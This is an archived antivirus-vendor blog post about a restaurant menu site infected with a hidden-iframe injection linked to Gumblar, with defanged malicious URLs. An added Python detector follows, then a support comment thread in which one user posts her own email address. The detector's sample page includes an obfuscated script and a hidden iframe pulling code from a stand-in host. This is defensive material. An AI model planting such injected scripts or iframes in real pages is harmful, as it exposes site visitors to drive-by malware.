March 19th, 2010

Would you like an iframe, sir?

Yesterday, when I was about to get something to eat, my attempt to check a menu online ended up with a warning about HTML:Iframe-LZ. Well, that’s quite a spicy item for an ordinary daily menu. So, let’s look at what’s under the hood.

Starter: a piece of JavaScript at the end of the page – served in a nicely roasted layer of obfuscation, really delicious.

[screenshot: delicious script]

Main course: you can choose either a speciality of Chinese cuisine delivered by hxxp://b.nt002.cn/E/J.JS (fortunately already down) or a Russian shashlik that contains some popular ingredients (such as google, classmates or linkhelper) in the following order – hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/ (also already down; both of these links belong to a Gumblar system).

Dessert: a nice little snippet that carries out the execution of all the malcode.

[screenshot: cake & coffee]

Anyone else hungry out there? :-)
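The injection described above, as an added example that is not part of the original post: a small Python script that statically checks saved HTML for the two tell-tale signs the post walks through, an obfuscated script block appended after the end of the page and injected iframes that pull third-party content, typically sized or styled so the visitor never sees them. The sample page, the marker list and the hostnames (menu.example, maps.example.com, bad.example) are constructed for the demo and are not the indicators from the post.

```python
"""Added example, not code from the original Avast post: a static checker for
injected content of the kind described above (obfuscated script appended at the
end of the page, hidden off-site iframes). Hostnames, the marker list and the
sample page are constructed for the demo."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Strings that commonly appear in obfuscated injected JavaScript (constructed list).
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "document.write(")
# A run of eight or more %XX, \xXX or \uXXXX escapes in a row.
ESCAPE_RUN = re.compile(r"(?:%[0-9a-fA-F]{2}|\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}){8,}")


class InjectionScanner(HTMLParser):
    """Collects iframe attributes and inline script bodies from one page."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # attribute dicts, one per <iframe>
        self.scripts = []          # (appended_after_body, body) per inline <script>
        self._body_closed = False
        self._in_script = False
        self._script_after_body = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True
            self._script_after_body = self._body_closed  # script placed after </body>?
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "body":
            self._body_closed = True
        elif tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append((self._script_after_body, "".join(self._buf)))


def is_hidden(attrs):
    """True when an iframe is sized or styled so that the visitor cannot see it."""
    def dim(value):
        try:
            return int(str(value).lower().rstrip("px"))
        except ValueError:
            return None
    width, height = dim(attrs.get("width", "")), dim(attrs.get("height", ""))
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return ((width is not None and width <= 1) or (height is not None and height <= 1)
            or "display:none" in style or "visibility:hidden" in style)


def scan_page(html, page_host):
    """Return (kind, detail) findings for one HTML document served from page_host."""
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = (urlparse(src).hostname or page_host).lower()   # relative src = same host
        offsite = host != page_host and not host.endswith("." + page_host)
        if offsite and is_hidden(attrs):
            findings.append(("hidden_offsite_iframe", src))
        elif offsite:
            findings.append(("offsite_iframe", src))
    for after_body, body in parser.scripts:
        markers = [m for m in OBFUSCATION_MARKERS if m in body]
        if ESCAPE_RUN.search(body) or len(markers) >= 2:
            where = "appended after </body>" if after_body else "inside the page"
            findings.append(("obfuscated_script", where + "; markers: " + ", ".join(markers)))
    return findings


# Constructed sample: a harmless menu page with an obfuscated script and a 0x0
# iframe appended after </html>, the pattern the post describes.
SAMPLE_PAGE = """<html><head><title>Menu</title></head>
<body><h1>Today's menu</h1><p>Soup, steak, cake.</p>
<iframe src="https://maps.example.com/embed" width="400" height="300"></iframe>
</body></html>
<script>var s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22http://bad.example/loader.js%22%3E%3C/iframe%3E");document.write(s);</script>
<iframe src="http://bad.example/loader.js" width="0" height="0" style="display:none"></iframe>
"""

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE, "menu.example"):
        print(kind, "->", detail)
```

Run it over the HTML files of a site you administer rather than over what a browser renders: the injected block sits in the served file, and the combination of an obfuscated script after `</body>` with a zero-sized off-site iframe is the thing to grep for when cleaning up after this kind of compromise. A visible off-site iframe on its own (the maps embed in the sample) is only reported at a lower level, since legitimate pages embed third-party content all the time.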

  • http://www.ppinfotek.com Yanto Chiang

    Michal,

    I am always hungry to learn from you guys…

    Please teach me more…and more….

    cheers,

  • http://www.ppinfotek.com Yanto Chiang

    Hi Michal,

    I don’t see that avast! blocks one of your referenced sites, like:

    hxxp://www.unmaskparasites.com/security-report/?page=www.duowan.com/0910/119283364074.html

    When I opened it, nothing happened with avast!, although it has been detected that this site contains some suspicious links.

    cheers,
    yanto chiang

  • Chocobollz

    Hi there, in one of your posts (here: /2010/02/18/ads-poisoning-–-jsprontexi/ ), there’s someone who is asking this question:

    Dawn :
    Do you need the web shield for this? I disabled that function because it worsened my surfing speed. I only use File System Shield and Behavior Shield.

    I would like to know it too: do we need to activate the webshield to detect those JS viruses or not? I ask this because I myself usually turn the webshield off because it interferes with my firewall.

    Best regards.

  • http://www.avast.com Michal Krejdl

    @Yanto Chiang
    I’m not certain whether duowan.com is really related to any of my references, because they were unreachable when I tried them.

  • http://www.avast.com Michal Krejdl

    @Chocobollz
    This infection was caught by Web shield. I can only suggest that you turn it on, because the vast majority of malware attacks come from the internet/surfing nowadays. Some issues with slow browsing while having web shield turned on are currently discussed here http://forum.avast.com/index.php?topic=56694.0

  • http://www.ppinfotek.com Yanto Chiang

    Michal Krejdl :
    @Yanto Chiang
    I’m not certain whether duowan.com is really related to any of my references, because they were unreachable when I tried them.

    Hi Michal,

    It’s okay,

    I randomly analyzed your referenced link.
    Anyway, nice article to share with us… keep going forth to contribute on security issues in the IT world.

    cheers,
    yanto chiang

  • Chocobollz

    @Michal Krejdl
    Thank you for your reply. Anyway, speed isn’t the issue for me; the problem is that if I turn the webshield on, it makes my firewall (Outpost Firewall Pro) become ineffective. I mean, all of the connection requests made by the browser will be shown as coming from the webshield, not the browser itself, so it kind of makes my firewall useless, as it cannot apply restrictions based on individual applications. I just hope that Avast would place its scanner after a firewall, not before it. That would likely solve the problem.

  • http://www.avast.com Vojta – Avast support team

    Chocobollz :

    @Michal Krejdl
    Thank you for your reply. Anyway, speed isn’t the issue for me; the problem is that if I turn the webshield on, it makes my firewall (Outpost Firewall Pro) become ineffective. I mean, all of the connection requests made by the browser will be shown as coming from the webshield, not the browser itself, so it kind of makes my firewall useless, as it cannot apply restrictions based on individual applications. I just hope that Avast would place its scanner after a firewall, not before it. That would likely solve the problem.

    Hello,
    Webshield acts as an HTTP proxy, so all traffic goes through the webshield to the internet. We recommend that you use our built-in firewall in Avast Internet Security.

  • http://manges.blogghavet.com Magnus Johansson

    Hi
    Sorry for posting here, but I have a problem I don’t know how to solve.

    I am using Comodo Dragon as my default browser, and when I check my Avast settings I can’t see any activity in the webshield. Comodo Dragon is a very new browser, but it’s similar to Google Chrome. Webshield does not scan when I am surfing the web.
    But the Avast scanner is scanning my network traffic even if I use Comodo Dragon, and when I switch to Internet Explorer 8 everything works as it should.
    I don’t want to be unprotected when I surf the web using Comodo. Can you please give me an explanation?
    Sorry, I forgot to say that I am running Comodo Dragon and Avast with Windows 7 Ultimate x86.
    Sorry for my bad English.

  • http://wwwavast.com jorge

    Avast, I would like there to be an online technical support service, more security.

  • http://www.avast.com Vojta – Avast support team

    Magnus Johansson :

    Hi
    Sorry for posting here, but I have a problem I don’t know how to solve.

    I am using Comodo Dragon as my default browser, and when I check my Avast settings I can’t see any activity in the webshield. Comodo Dragon is a very new browser, but it’s similar to Google Chrome. Webshield does not scan when I am surfing the web.
    But the Avast scanner is scanning my network traffic even if I use Comodo Dragon, and when I switch to Internet Explorer 8 everything works as it should.
    I don’t want to be unprotected when I surf the web using Comodo. Can you please give me an explanation?
    Sorry, I forgot to say that I am running Comodo Dragon and Avast with Windows 7 Ultimate x86.
    Sorry for my bad English.

    Hello,
    please leave us a ticket on support.avast.com so we can handle your problem effectively and we can track our communication. Meanwhile I am going to test the browser.

  • http://www.avast.com Vojta – Avast support team

    @Magnus Johansson
    Hello,
    good news, Magnus
    Within the next 48 hours you will receive a new VPS update and Avast Webshield will scan the Comodo Dragon packets. So just keep your VPS updates running.

  • spg SCOTT

    @Vojta – Avast support team

    Interesting, there was a question about this on the forum…

    So the OptinProcess will not be needed anymore?

    The thread: http://forum.avast.com/index.php?topic=57721

    -Scott-

  • GW Anderson

    Thank you for today’s (29 March, 2010) blog “Why does http://www.avast.eu take me to the Avira website?…..or isn’t security built on trust?”

    I have my own problems with Avira. It is helpful to know this information in order that I may help those who truly want avast! Do not be misled. You are correct. Trust is very important.

    Thank you again.

    GWA

  • http://www.avast.com Michal Krejdl

    @GW Anderson
    This domain is owned by Avira since 2006. Our official domain is avast.com.

  • GW Anderson

    Thank you. I do not understand the RSS feed which I mentioned in the above note which came this morning.

  • http://www.avast.com Michal Krejdl

    @GW Anderson
    Oh, now I can see it. I was a bit confused, because the article is not available except to those RSS readers that caught it.

  • GW Anderson

    Was the article withdrawn? When I went to the website to view the complete article, I was ‘welcomed’ to the Error 404 page.

    Thanks for responding.

    • http://www.avast.com Vincent Steckler

      Sorry for that. Hit the publish button before it was ready. It is there now.

  • http://manges.blogghavet.com magnus johansson

    @Vojta – Avast support team.
    Comodo still doesn’t work with Avast 5.0. I have reinstalled Avast like you suggested and I also reinstalled Comodo. Can you solve this, or I am considering uninstalling Avast and trying something else.
    @Scott. I modified the .ini file and it did the trick, but why should I need to do that? This bug in Avast or Comodo can’t be impossible to fix. I have been in contact with both Avast support and the Comodo support and both said the problem is solved. Is it me and my computer or what?

  • spg SCOTT

    @magnus johansson

    It is not necessarily a bug in either.
    As far as I know, there is a list of browsers that are scanned by default (e.g. IE, Fx, the other mainstream browsers) and Dragon is not currently on that list.

    I am not quite sure as to why this is but it is the way that it is done.

    The INI modification is a workaround of sorts, and adds Dragon to be scanned.

    The way I see it is that Dragon is not so well known to the ALWIL devs and so they have to look into it before it gets scanned.

    It was initially also the same with Chrome, but now it is supported by default.

    -Scott-

    p.s. Glad the thread helped :)

  • http://manges.blogghavet.com Magnus Johansson

    Problem solved.
    The latest VPS update did the trick. Feels so good!
    Thanks everyone who helped me with this especially @Scott and @Vojta – Avast support team

  • spg SCOTT

    You’re Welcome :)

  • http://www.avast.com Vojta – Avast support team

    spg SCOTT :

    @Vojta – Avast support team

    Interesting, there was a question about this on the forum…

    So the OptinProcess will not be needed anymore?

    The thread: http://forum.avast.com/index.php?topic=57721

    -Scott-

    Hello,
    it is already in the Avast code so there is no need to add it manually.

  • spg SCOTT

    @Vojta – Avast support team
    Hi,

    Yes, I saw that in the thread and in Magnus Johansson’s post :D

    -Scott-

  • spg SCOTT

    @Vojta – Avast support team
    As a side note, maybe the knowledge-base article on the subject could be updated for version 5?

  • Mario

    Hi, Trend Micro detected this website hxxp://www.swfcabin.com/open/1243702443 as malware, and I went on the website on my home computer and I’m scared my computer is infected with the malware. Can you get avast! Home, the free antivirus, to detect it please? I’m begging you, I’m very scared, and I just paid $100 dollars to have my computer fixed, so please get avast! Home, the free antivirus version, to detect the malware. So please get avast Home, the free antivirus, to detect it.

  • http://www.avast.com Vojta – Avast support team

    @spg SCOTT
    Do you mean the article about this particular browser or a general note about adding the browser into the webshield?

  • spg SCOTT

    I was thinking about this one:
    http://support.avast.com/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=374

    Maybe it could be updated to include the ones that are scanned in V5

    And possibly have it show how to optin one that is not scanned?

    -Scott-

  • http://www.avast.com Vojta – Avast support team

    @spg SCOTT
    Hello Scott,
    it will be updated.

  • spg SCOTT

    @Vojta – Avast support team

    Cool, Thanks :)

    The more knowledgebase articles we have, the better ;)

    -Scott-

  • http://Verizon Patti

    Please cancel my avast anti-virus and e-mail me the results in cancelling this system from my computer.

    Patti
    2YA7

  • http://Verizon Patti

    Please notify me of system being off my computer. There is no cancelling information and I no longer want it on my computer. E-mail me these results of no longer having avast on my computer. As soon as possible I want it off my computer, and a response from you. Send response to psasala@verizon.net
    Thank You,
    Patti Sasala